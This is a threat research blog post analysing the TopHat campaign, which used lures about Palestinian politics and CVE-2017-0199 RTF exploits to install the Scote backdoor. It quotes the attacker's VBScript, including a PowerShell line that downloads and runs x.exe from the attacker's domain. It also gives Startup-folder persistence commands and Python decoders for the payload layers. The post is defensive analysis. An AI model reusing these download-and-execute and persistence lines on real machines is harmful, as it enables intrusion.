[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Nation-State Cyberattacks](https://unit42.paloaltonetworks.com/category/nation-state-cyberattacks/ "Nation-State Cyberattacks")  
  [Nation-State Cyberattacks](https://unit42.paloaltonetworks.com/category/nation-state-cyberattacks/)

# The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 14 min read  
Related Products  
[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/product-category/cortex-xdr/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:January 26, 2018

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Nation-State Cyberattacks](https://unit42.paloaltonetworks.com/category/nation-state-cyberattacks/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [Core](https://unit42.paloaltonetworks.com/tag/core/)
  * [DustySky](https://unit42.paloaltonetworks.com/tag/dustysky/)
  * [Palestinian Territories](https://unit42.paloaltonetworks.com/tag/palestinian-territories/)
  * [Scote](https://unit42.paloaltonetworks.com/tag/scote/)
  * [TopHat](https://unit42.paloaltonetworks.com/tag/tophat/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/?pdf=download&lg=en&_wpnonce=dc23a6ba65 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/?pdf=print&lg=en&_wpnonce=dc23a6ba65 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=The%20TopHat%20Campaign:%20Attacks%20Within%20The%20Middle%20East%20Region%20Using%20Popular%20Third-Party%20Services&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services%2F&title=The%20TopHat%20Campaign:%20Attacks%20Within%20The%20Middle%20East%20Region%20Using%20Popular%20Third-Party%20Services "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services%2F&text=The%20TopHat%20Campaign:%20Attacks%20Within%20The%20Middle%20East%20Region%20Using%20Popular%20Third-Party%20Services "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=The%20TopHat%20Campaign:%20Attacks%20Within%20The%20Middle%20East%20Region%20Using%20Popular%20Third-Party%20Services%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services%2F "Share in Mastodon")
  Summary  
  In recent months, Palo Alto Networks Unit 42 observed a wave of attacks leveraging popular third-party services Google+, Pastebin, and bit.ly. Attackers used Arabic language decoy documents related to current events within the Palestine Territories as lures to entice victims to open and subsequently be infected by the malware. There is data indicating that these attacks are targeting individuals or organizations within the Palestinian Territories, which is detailed later.  
  The attacks themselves are deployed via four different means, two involving malicious RTF files, one involving self-extracting Windows executables, and the final using RAR archives.  
  The ultimate payload is a new malware family that we have dubbed "Scote" based on strings we found within the malware samples. Scote provides backdoor access for an attacker and we have observed it collecting command and control (C2) information from Pastebin links as well as Google+ profiles. The bit.ly links obscured the C2 URLs so victims could not evaluate the legitimacy of the final site prior to clicking it. We are calling their recent activity the "TopHat" campaign.  
  Additionally, we tracked the apparent author testing their malware against numerous security products. Our tracking of this testing enabled us to both note changes made over time as well as to observe other malware being submitted by the author. This other malware submitted provided overlaps with the previously reported [DustySky campaign](https://www.clearskysec.com/dustysky/). In addition to testing malicious RTFs that deploy the Scote malware family, the same attacker was witnessed submitting files that appear to be new variants of the DustySky Core malware discussed in their report.

Malware Delivery Techniques  
The attacks we found within the TopHat campaign began in early September 2017. In a few instances, original filenames of the identified samples were written in Arabic. Specifically, we found the following names during this investigation:

|----------------------------|-------------------------------------------|
| **Original Filename**      | **Translation**                           |
| الرئيس يبدا بحل السلطة.rar | The president begins dissolving power.rar |
| الرئيس يبدا بحل السلطة.scr | The president begins dissolving power.scr |
| محضر اجتماع اليوم.doc      | Minutes of today's meeting.doc            |

We observed a series of techniques used to deploy the Scote malware family. To date, at a high level, we have observed the following four techniques, each of which we delve into in this blog:  
[![tophat\_1](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_1.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_1.png)

*Figure 1 Malware delivery techniques*

Technique #1 -- RTFs Leveraging Bit.ly  
The first technique encountered included the use of malicious RTFs that made a HTTP request to the below URL which then redirected to the below malicious site (note the intentional typo of "storage"):

|---------------------------|---------------------------------------|
| **URL**                   | **Redirect**                          |
| http://bit\[.\]ly/2y3XL3P | http://storgemydata\[.\]website/v.dat |

This 'v.dat' file was in turn a PE32 executable file that has the following SHA256 hash:

|--------|------------------------------------------------------------------|
| SHA256 | 862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5 |

Looking at the publicly available statistics for the bit\[.\]ly redirect, we see the majority of activity taking place in late October of this year. Additionally, we see the majority of the downloads originating from both the Palestinian Territories as well as the United Arab Emirates. This provides clues as to who the victims are or where attackers may originate from.

[![tophat\_2](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_2.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_2.png)

*Figure 2 Statistics surrounding malicious redirect*

Technique #2 -- Don't Kill My Cat Attacks  
The second technique uses an interesting tactic that Unit 42 has not seen before. Specifically, it makes use of an attack discussed in July of this year called Don't Kill My Cat or DKMC. DKMC can enable an attacker to load a legitimate bitmap (BMP) file that contains shellcode within it. The DKMC tool and more information about this tactic may be found [here](https://github.com/Mr-Un1k0d3r/DKMC).  
This specific attack begins with a malicious executable file that downloads a legitimate BMP file that looks like the following:  
![tophat\_3](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_3.png)

*Figure 3 Malicious BMP image retrieved by downloader*

It should be noted that this is the same image used in the DKMC presentation. It would appear that the attackers simply used the default settings of this particular program.  
This BMP file is loaded as shellcode. The first six bytes are read as the following instructions:  
seg000:00000000 inc edx seg000:00000001 dec ebp seg000:00000002 jmp loc\_34D8B

|-------|-------------------------------------------------------------------------------|
| 1 2 3 | seg000:00000000 inc edx seg000:00000001 dec ebp seg000:00000002 jmp loc\_34D8B |

Code execution is then redirected to embedded shellcode.  
The underlying shellcode is decrypted at runtime using a 4-byte XOR key of 0x3C0922F0. The shellcode eventually loads an embedded UPX-packed executable and redirects execution to this file. This file is an instance of the Scote malware family. The size of the payload and the fact that it is embedded within the BMP file explains the large amount of distortion witnessed in the image above. In other words, the distortion witnessed is actually the shellcode and the embedded Scote malware. As this data is converted within a BMP image, we're left with what essentially looks like random pixels.

Technique #3 -- RTFs Exploiting CVE-2017-0199.  
This technique begins with malicious RTF files that make use of [CVE-2017-0199](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199) a Microsoft Office/WordPad remote code execution (RCE) vulnerability patched by Microsoft in September 2017. When opened, the following lure is displayed to the victim (translation on the right provided by Google Translate):  
[![tophat\_4](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_4.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_4.png)

*Figure 4 Lure used by malicious RTFs*

This lure is related to an event [reported](https://indianexpress.com/article/world/palestinians-to-turn-presidential-palace-into-national-library-4816384/)in late August where President Mahmoud Abbas announced plans to convert a planned presidential palace into a national library. This is consistent with the timeline of the attacks we witnessed, as the event took place roughly a week before we observed these malware samples.  
These RTFs will also download a file from the following location:

* storgemydata\[.\]website/update-online/office-update.rtf

Note that this is the same domain witnessed in the redirect used in technique #1. While the downloaded file has an RTF extension, it is in fact a VBScript with the following contents:  
\<script language="VBScript"\> window.moveTo -4000, -4000 Set vFwhEtGt = CreateObject("Wscript.Shell") Set lfTi = CreateObject("Scripting.FileSystemObject") If 1=1 Then vFwhEtGt.Run ("PowerShell.exe -WindowStyle Hidden $d=$env:userprofile+'\\\\start Menu\\\\Programs\\\\Startup\\\\\\12330718701ac441736a55e3ee3cx996.exe';(New-Object System.Net.WebClient).DownloadFile('http://storgemydata\[.\]website/x.exe',$d);Start-Process $d;"),0 End If window.close() \</script\>

|-------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 | \<script language="VBScript"\> window.moveTo -4000, -4000 Set vFwhEtGt = CreateObject("Wscript.Shell") Set lfTi = CreateObject("Scripting.FileSystemObject") If 1=1 Then vFwhEtGt.Run ("PowerShell.exe -WindowStyle Hidden $d=$env:userprofile+'\\\\start Menu\\\\Programs\\\\Startup\\\\\\12330718701ac441736a55e3ee3cx996.exe';(New-Object System.Net.WebClient).DownloadFile('http://storgemydata\[.\]website/x.exe',$d);Start-Process $d;"),0 End If window.close() \</script\> |

This VBScript script executes a PowerShell command that will download and execute a file from the following location:

* http://storgemydata\[.\]website/x.exe

This final 'x.exe' executable file is an instance of the Scote malware family.

Technique #4 -- Self-extracting Executables  
The last technique makes use of self-extracting executable files to both load a decoy document and spawn an instance of Scote. When the malware is run it will drop a file with an original filename of 'abbas.rtf', which contains the following contents:  
[![tophat\_5](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_5.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_5.png)

*Figure 5 TopHat decoy document with rough translation*

Additionally, an instance of Scote is loaded on the victim machine.  
The decoy document used discusses the potential dissolving of the Palestinian Authority (PA) by the President Mahmoud Abbas. This particular event was [reported](https://www.middleeastmonitor.com/20170823-abbas-considers-option-of-dissolving-pa-and-switching-power-to-plo/)on August 23, 2017, just before Trump administration officials were set to visit Ramallah.  
Later in this blog, we will see the attackers leveraging this Donald Trump connection even more.  
We originally witnessed these specific RTFs on September 6^th^, 2017, just two weeks after this event.  
Based on the observed statistics from the malicious redirect found in technique #1, as well as the content of this decoy document, we can infer that at least some of the targeted victims may very well be located in the Palestinian Territories.

Analysis of the Scote Malware  
The Scote malware family employs a series of techniques and tricks when it is originally loaded onto a victim machine. However, underneath the various layers of obfuscation lies a fairly straightforward malware family that abuses legitimate third-party online services to host its C2 information.  
When Scote originally is run, it will decode embedded configuration information. This embedded configuration information contains URLs to third party online services, such as Pastebin postings or Google+ accounts. Scote will use this information to attempt to retrieve data from these URLS and parse it, such as in the following example:  
![tophat\_6](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_6.png)

*Figure 6 Google+ profile used by Scote malware*

It should be noted that a total of three Google+ profiles have been observed and all of these profiles contained the name 'Donald Trump'. This is interesting given the topics we saw being used to deliver the Scote malware family within the TopHat campaign, many of which also referred to the President of the Palestinian Territories.  
After C2 information is retrieved by Scote, it will communicate with these servers and can accept commands that perform the following actions:

* Kill the Scote malware
* Run 'ipconfig' on the victim and return results
* Run 'cmd.exe /C systeminfo' and return results
* Load a DLL that is downloaded from a C2

For more information about the Scote malware family, please refer to the [Appendix](#appendix).

Identified Malware Testing Against Security Solutions  
When looking at the malicious RTF documents in technique #4 that exploit CVE-2017-0199 we found that all of the files we encountered were submitted within close succession of each other to an online service that tests them against multiple security products. Additionally, the original filenames of these files implied that an attacker may have been testing their malware against one or more security products.

|------------------------------------------------------------------|--------------|-------------------------|
| **SHA256**                                                       | **Filename** | **Date**                |
| cb6cf34853351ba62d4dd2c609d6a41c618881670d5652ffa7ddf5496e4693f0 | test1.rtf    | 2017-09-06 15:00:08 UTC |
| 8a158271521861e6362ee39710ac833c937ecf2d5cbf4065cb44f3232224cf64 | xx.rtf       | 2017-09-06 15:00:53 UTC |
| d302f794d45c2a6eaaf58ade70a9044e28bc9ec43c9f7a1088a606684b1364b5 | xx2.rtf      | 2017-09-06 15:01:49 UTC |
| 1cd49a82243eacdd08eee6727375c1ab83e8ecca0e5ab7954c681038e8dd65a1 | xx2.rtf      | 2017-09-06 15:05:30 UTC |
| d409d26cffe6ce5298956bd65fd604edf9cfa14bc3373a7bdeb47091729f09e9 | xx2.rtf      | 2017-09-06 15:08:32 UTC |
| aa18b8175f68e8eefa12cd2033368bc1b73ff7caf05b405f6ff1e09ef812803c | xx2.rtf      | 2017-09-06 15:18:14 UTC |

As we can see by the timestamps shown above, the files were submitted anywhere from one to ten minutes apart from each other. Looking closer at these files we can see what changed between iterations.  
[![tophat\_7](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_7.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_7.png)

*Figure 7 Modifications made to RTFs by attacker*

As it so happens, the first RTF file this attacker attempted to test had very few detections. However, this was due to the fact that the attempts at commenting out the backslashes caused this file to not open at all within Microsoft Word. When you attempt to open this file, Word will simply render the content as it would a normal text file.  
It appeared that the attacker realized this, as he or she quickly corrected this, and proceeded to make very minor modifications to try and evade security products. However, none of the modifications were terribly effective: all of these samples were found to have a high rate of detection.  
As we can see in Figure 7, the attacker made multiple very small modifications between each iteration, specifically around the '\\object\\objlink\\objupdate' string. This particular control allows the malicious content to be loaded by the RTF, as outlined in an analysis by [MDSec](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/). As such, the attacker likely felt this was what resulted in the RTF being detected as malicious, and attempted to obfuscated it.

Overlap with the DustySky Campaign  
Besides being able to witness the attacker testing his or her malware, we noticed something interesting when we were looking at the individual who submitted these files. About a month and a half after these files were submitted, the same individual submitted the following three samples that we attribute to the [DustySky](https://www.clearskysec.com/dustysky/) campaign:

* 202d1d51254eb13c64d143c387a87c5e7ce97ba3dcfd12dd202a640439a9ea3b
* d18e09debde4748163efa25817b197f3ff0414d2255f401b625067669e8e571e
* 3e4d0ffdde0b5db2a0a526730ff63908cefc9634f07ec027c478c123912554bb

DustySky is a campaign published by ClearSky in January 2016 that discusses a politically motivated group that primarily targets organizations within the Middle East. The group has remained active since they were originally reported on, including a campaign identified by Unit 42 [earlier this year](https://blog.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/). These files appear to be new variants of the DustySky Core malware discussed in the report and they communicate with the following domains over HTTPS:

* fulltext.yourtrap\[.\]com
* checktest.www1\[.\]biz

The malware is dropped via a self-extracting executable, which contains an empty decoy document with the following name:

* انباء عن احتجاز الرئيس عباس في السعودية واعلان دحلان رئيسا لفلسطين.docx

This can roughly be translated to the following:

* News of the detention of President Abbas in Saudi Arabia and Dahlan's declaration as President of Palestine.docx

As we can see, the name of this decoy document is consistent with the lures witnessed in the TopHat campaign.

Conclusion

Attackers often are found to leverage current events to accomplish their goal. In the TopHat campaign, we have observed yet another instance where a threat actor looks to be using political events to target individuals or organizations within the Palestine region. This campaign leveraged multiple methods to deploy a previously unseen malware family, including some relatively new tactics in the case of using a legitimate BMP file to load malicious shellcode.  
The new malware family, which we have dubbed Scote, employs various tricks and tactics to evade detection, but provides relatively little functionality to the attackers once deployed. This may well be due to the fact it is still under active development. Scote uses some interesting methods when retrieving C2 information, including the use of Pastebin and Google+ accounts, as well as using bit.ly links to obscure the C2 URLs so victims could not evaluate the legitimacy of the final site prior to clicking it.  
The TopHat campaign was found to have some overlaps discovered with the previously reported DustySky campaign when the attacker was identified to be submitting their files for testing purposes. Unit 42 will continue to track and monitor this threat and will report on any developments that occur.  
Palo Alto Networks customers are protected by this threat in the following ways:

* The [Scote](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Scote) malware family and the [TopHat](https://autofocus.paloaltonetworks.com/#/tag/Unit42.TopHat) campaign have been tagged within AutoFocus for continued tracking
* [DustySky](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DustySky) is tagged within AutoFocus for ongoing tracking
* All malicious domains discovered within this campaign have been appropriately flagged as malware
* All samples are marked malicious within WildFire
* Traps identifies and blocks the exploits used by the RTF files

Additionally, Google, Pastebin, and bit.ly have been notified of the malicious content being hosted on their services.

**Appendix**

Indicators of Compromise  
**SHA256 Hashes**  
d3ead67228b3d7968ac767648b46a8e906affa0ebb5cc69f7acbed475a97204c  
03e2b932c013252fa2eb5e35390f9e21d0ff87e5b1c01683ebce0e8ce9b8d6df  
4df9488fbdfaf5d05fda65175a6b6e5331c58c967adbe972aa46c64b4fd0b1bb  
0dde9940f7896c2e4fb881dd185c3c3db280a9fd2ac2cb81988f43f5b0f6fcf7  
613da5f745c281acbffa4375e96394f8c912f58f92afe347e8a1f10fad3489bb  
d0f2d2d7d82c91fe64a64552e0e6200a096230fb6a64a1307928ae33ab2a5bf8  
7b6347093b27174e27228c2fde7d39e02d57315b354461aaf1dee3f0800fdfc3  
bdc633fe3145d87036ad759be855771d5bb3ca592cecca9ef7f41454d7cf9f05  
ed9c62f77055a2498aec681b5653240be534595b97a9d11e92371639b0ca9a48  
7a1fa34ca804492415579c3ed4f505a7f09fcd7bc834590cff86e2ce77c4fc73  
862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5  
3540c2f0765773fa0a822fcf5fed5ed2a363ad11291a66ab1b488c9a4aa857f9  
ddc13c8d3d55562df873d4cf17181164922cb71d0c94edeb8fa143033c1214e0  
d4cb6b76dd352c928ca7184f583d14d800c090ba650dd26d8fa4febe901d1205  
5c0b253966befd57f4d22548f01116ffa367d027f162514c1b043a747bead596  
1f9bca1d5ce5d14d478d32f105b3ab5d15e1c520bde5dfca22324262e84d4eaf  
c9ba9e11a19120b58af1f6ccf3beb25744580592c680718a6fc205d662f2a20e  
aa18b8175f68e8eefa12cd2033368bc1b73ff7caf05b405f6ff1e09ef812803c  
d409d26cffe6ce5298956bd65fd604edf9cfa14bc3373a7bdeb47091729f09e9  
d302f794d45c2a6eaaf58ade70a9044e28bc9ec43c9f7a1088a606684b1364b5  
1cd49a82243eacdd08eee6727375c1ab83e8ecca0e5ab7954c681038e8dd65a1  
8a158271521861e6362ee39710ac833c937ecf2d5cbf4065cb44f3232224cf64  
3627ed71588c7b55b35592c3b277910041f3d5ff917de721c53684ee18fcda40  
109996d28700fa0e8594d6ecca422418fa43e1b7cf5f9f4442a69264bf5fcea4  
c2815c72c9ea70db073775269ef04b1d061e93580f0f5fd3f3de25601641576a  
**Domains**  
storgemydata\[.\]website

Scote Technical Analysis  
For the technical analysis, we used the following sample:

|--------|------------------------------------------------------------------|
| SHA256 | 3540c2f0765773fa0a822fcf5fed5ed2a363ad11291a66ab1b488c9a4aa857f9 |

This particular sample begins as a self-extracting executable. When run, it will drop a 'e.exe' sample and execute the following SFX script commands:  
Path=%userprofile%\\start menu\\programs\\startup\\ Setup=e.exe Silent=1 Overwrite=1 Update=U

|-----------|-----------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | Path=%userprofile%\\start menu\\programs\\startup\\ Setup=e.exe Silent=1 Overwrite=1 Update=U |

For those unfamiliar with SFX commands, the series of commands above is silently deploying e.exe to the startup path. It will overwrite any instances where e.exe already exists in this path.  
The 'e.exe' file is compiled in Delphi and has the following SHA256 hash:

|--------|------------------------------------------------------------------|
| SHA256 | 9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7 |

When run, 'e.exe' will periodically decrypt strings at runtime using a simple single-byte XOR routine. While the routine allows for different bytes to be used, the author chose to use a key of 0xFF in every observed instance.  
The malware proceeds to get the address of the NtDelayExecution function from ntdll.dll. This function is used by Sleep to cause a delay in program execution. After this function address has been resolved, it will overwrite the first five bytes to jmp to a malicious function, as seen below:  
![tophat\_8](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/01/tophat_8.png)

*Figure 8 Modifications to NtDelayExeuction*

The malware proceeds to make a call to Sleep with an argument of 1, thus redirecting execution to this malicious function. This is likely an attempt at thwarting anti-virus and security solutions, however, has the adverse effect of preventing the malware from making subsequent calls to Sleep.  
This malicious function continues to decode more strings using the single-byte XOR technique. Additionally, it will copy the following functions out of ntdll.dll for later use:

* ZwCreateUserProcess
* ZwAllocateVirtualMemory
* ZwWriteVirtualMemory
* ZwGetContextThread
* ZwSetContextThread
* ZwResumeThread

A large blob of encrypted data is decrypted using a modified version of RC4. The following Python code may be used to decrypt this data. The key has consistently been observed to be "qlNwuFVA9K8HpGNY6x0I".  
import base64 import binascii import hexdump import sys def rc4\_crypt(data, key): S = range(256) j = 0 out = \[\] for i in range(256): j = (j + S\[i\] + ord( key\[i % len(key)\] )) % 256 S\[i\] , S\[j\] = S\[j\] , S\[i\] i = 0 for char in data: j = (S\[i % 256\] + j) % 256 t = S\[i%256\] S\[i%256\] = S\[j\] S\[j\] = t out.append(chr(ord(char) ^ S\[(S\[i%256\] + S\[j\]) % 256\])) i += 1 return ''.join(out) file = sys.argv\[1\] f = open(file, 'rb') fd = f.read() f.close() output = rc4\_crypt(fd, "qlNwuFVA9K8HpGNY6x0I") f = open("decrypted\_data.bin",'wb') f.write(output) f.close()

|----------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | import base64 import binascii import hexdump import sys def rc4\_crypt(data, key): S = range(256) j = 0 out = \[\] for i in range(256): j = (j + S\[i\] + ord( key\[i % len(key)\] )) % 256 S\[i\] , S\[j\] = S\[j\] , S\[i\] i = 0 for char in data: j = (S\[i % 256\] + j) % 256 t = S\[i%256\] S\[i%256\] = S\[j\] S\[j\] = t out.append(chr(ord(char) ^ S\[(S\[i%256\] + S\[j\]) % 256\])) i += 1 return ''.join(out) file = sys.argv\[1\] f = open(file, 'rb') fd = f.read() f.close() output = rc4\_crypt(fd, "qlNwuFVA9K8HpGNY6x0I") f = open("decrypted\_data.bin",'wb') f.write(output) f.close() |

This decrypted code is then copied to a newly allocated block of memory before execution flow is redirected to it. When this newly decrypted code is called, it is provided with a string argument containing the path to svchost.exe.  
This new code is shellcode that will eventually decrypt an executable file and inject it into a newly spawned svchost.exe process.  
The shellcode in question makes certain decisions by the author that demonstrates a lack of sophistication. For example, it will load a series of libraries and functions using a common ROR13 technique. This technique begins with the attacker taking a string of a library or function, such as 'CreateProcessA', and performing a binary ROR13 against it. In this example, the attacker has a result of a DWORD of 0x16B3FE72. This DWORD is then typically hardcoded within the shellcode. The malicious code then iterates through the functions of the necessary library and applies the same ROR13 technique against each function until it finds a match.  
This shellcode uses the same approach, however, instead of providing the hardcoded DWORDs, it instead provides the clear-text library and function names, which then have the ROR13 applied. The resulting DWORD is then used. Unfortunately, this completely cancels out any obfuscation that might have originally been present.  
After the various libraries and functions are loaded, the shellcode decodes an embedded blob of data using a multi-byte XOR operation. The original key for this operation appears to have been 'Houdini', however, due to a likely mistake by the author, after the first iteration, a key of 'oudini\\x00' is used instead.  
The following example Python code decodes this data found within the shellcode:  
import sys from itertools import cycle, izip def xor(message, key): return ''.join(chr(ord(c)^ord(k)) for c,k in izip(message, cycle(key))) def decode(data, size): out = "" key = "oudini\\x00" b1 = xor(data\[0\], "H") b2 = xor(data\[1:size\], key) b = b1 + b2 for bite in b: out += chr((ord(bite) + 128) \& 0xff) return out file = sys.argv\[1\] f = open(file, 'rb') fd = f.read() f.close() size = 54272 output = decode(fd, size) f1 = "embeddedShellcode.bin" fh = open(f1, 'wb') fh.write(output) fh.close()

|-------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | import sys from itertools import cycle, izip def xor(message, key): return ''.join(chr(ord(c)^ord(k)) for c,k in izip(message, cycle(key))) def decode(data, size): out = "" key = "oudini\\x00" b1 = xor(data\[0\], "H") b2 = xor(data\[1:size\], key) b = b1 + b2 for bite in b: out += chr((ord(bite) + 128) \& 0xff) return out file = sys.argv\[1\] f = open(file, 'rb') fd = f.read() f.close() size = 54272 output = decode(fd, size) f1 = "embeddedShellcode.bin" fh = open(f1, 'wb') fh.write(output) fh.close() |

This decoded blob is a Microsoft Windows executable that contains the Scote payload. After this blob is decoded, a new instance of svchost.exe is spawned in a suspended state. The Scote payload is injected into this process prior to resuming it.  
Scote begins by loading and decoding an embedded resource string. It is decoded first using base64 with a customized alphabet. The result is then base64-decoded using the traditional alphabet. The following alphabet is used for the first phase of decoding:

* 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/

Once decoded, we're provided with the following configuration (newlines and spacing added for presentation):  
\[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]e3HGAiPJ\[/install\_name\] \[nick\_name\]4c1h7vLX\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\]

|-------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 | \[config\] \[connection\] \[param\]http://pastebin\[.\]com/raw/2cLsuXj6\[/param\] \[param\]http://pastebin\[.\]com/raw/trZZJTGA\[/param\] \[/connection\] \[install\_name\]e3HGAiPJ\[/install\_name\] \[nick\_name\]4c1h7vLX\[/nick\_name\] \[install\_folder\]noinstall\[/install\_folder\] \[reg\_startup\]false\[/reg\_startup\] \[folder\_startup\]false\[/folder\_startup\] \[task\_startup\]false\[/task\_startup\] \[injection\]true\[/injection\] \[injection\_process\]svchost\[/injection\_process\] |

